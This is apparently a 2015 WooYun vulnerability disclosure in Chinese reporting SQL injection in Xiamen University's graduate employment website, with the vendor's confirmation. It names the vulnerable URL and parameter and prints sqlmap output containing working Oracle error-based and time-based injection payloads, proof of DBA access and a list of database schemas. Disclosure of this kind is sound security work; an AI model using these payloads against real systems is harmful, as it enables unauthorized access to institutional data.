当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0161107

漏洞标题:厦门大学毕业生就业指导中心漏洞#DBA权限#获取数据库大量信息

相关厂商:厦门大学

漏洞作者: 路人甲

提交时间:2015-12-14 10:06

修复时间:2016-01-25 18:01

公开时间:2016-01-25 18:01

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-12-14: 细节已通知厂商并且等待厂商处理中
2015-12-14: 厂商已经确认,细节仅向厂商公开
2015-12-24: 细节向核心白帽子及相关领域专家公开
2016-01-03: 细节向普通白帽子公开
2016-01-13: 细节向实习白帽子公开
2016-01-25: 细节向公众公开

简要描述:

如题

详细说明:

0x01 漏洞描述

厦门大学毕业生就业指导中心,存在SQL注入,DBA权限,危害极大


0x02 漏洞地址

http://jy.xmu.edu.cn/


0x03 漏洞详细

http://jy.xmu.edu.cn/detach.portal?.pmn=view&action=bulletinBrowser&.ia=false&.pen=pe5882&bulletinId=e2467c3e-2906-11e4-a51e-dba799bccc82

关键字:bulletinId
0x04 漏洞利用工具

sqlmap

漏洞证明:

0x04 漏洞测试结果

sqlmap identified the following injection points with a total of 56 HTTP(s) requests:
---
Place: GET
Parameter: bulletinId
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: .pmn=view&action=bulletinBrowser&.ia=false&.pen=pe5882&bulletinId=e2467c3e-2906-11e4-a51e-dba799bccc82' AND 2388=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(104)||CHR(115)||CHR(105)||CHR(113)||(SELECT (CASE WHEN (2388=2388) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(116)||CHR(118)||CHR(115)||CHR(113)||CHR(62))) FROM DUAL) AND 'ZkjA'='ZkjA
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: .pmn=view&action=bulletinBrowser&.ia=false&.pen=pe5882&bulletinId=e2467c3e-2906-11e4-a51e-dba799bccc82' AND 7818=DBMS_PIPE.RECEIVE_MESSAGE(CHR(104)||CHR(116)||CHR(83)||CHR(65),5) AND 'kEuf'='kEuf
---
[14:28:21] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle
可知:DBA权限
[14:29:28] [INFO] testing if current user is DBA
[14:29:29] [WARNING] reflective value(s) found and filtering out
current user is DBA: True


所有数据库信息

available databases [53]:
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EXFSYS
[*] GCAMPUS
[*] GJREPORT
[*] MDSYS
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] REPORT
[*] SCOTT
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TS_PORTAL
[*] TSMSYS
[*] USR_BIEE_LIB
[*] USR_BISTAR
[*] USR_CCS_XMU
[*] USR_CSS
[*] USR_GGZXC
[*] USR_GZYQ
[*] USR_HR
[*] USR_HU
[*] USR_JY
[*] USR_JY_MH
[*] USR_JY_NEW
[*] USR_LX
[*] USR_MSG_XMU
[*] USR_OA
[*] USR_PHOTO
[*] USR_RS
[*] USR_RS_TZB
[*] USR_SR_XMU
[*] USR_SRNEW_DATA
[*] USR_SRNEW_FJ
[*] USR_SRNEW_KYRY
[*] USR_SRNEW_LK
[*] USR_SRNEW_WK
[*] USR_TB
[*] USR_TBFW
[*] USR_URP
[*] USR_XG
[*] USR_XSZHFW
[*] USR_XXZX
[*] USR_XY
[*] USR_YX
[*] USR_ZC
[*] USR_ZCGL
[*] USR_ZHFW
[*] WMSYS
[*] XDB


随便挑一个数据表统计数据

Database: SYSTEM
+---------------------------+---------+
| Table | Entries |
+---------------------------+---------+
| HELP | 978 |
| LOGSTDBY$SKIP_SUPPORT | 104 |
| MVIEW$_ADV_PARAMETERS | 40 |
| REPCAT$_OBJECT_TYPES | 28 |
| AQ$_QUEUES | 23 |
| REPCAT$_RESOLUTION_METHOD | 19 |
| AQ$_QUEUE_TABLES | 12 |
| AQ$_INTERNET_AGENTS | 3 |
| REPCAT$_TEMPLATE_STATUS | 3 |
| AQ$_INTERNET_AGENT_PRIVS | 2 |
| REPCAT$_AUDIT_ATTRIBUTE | 2 |
| REPCAT$_TEMPLATE_TYPES | 2 |
| DEF$_DESTINATION | 1 |
+---------------------------+---------+


可以获取大量信息…………不做过多测试

修复方案:

过滤相关参数

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-12-14 10:36

厂商回复:

已通知相关单位处理

最新状态:

暂无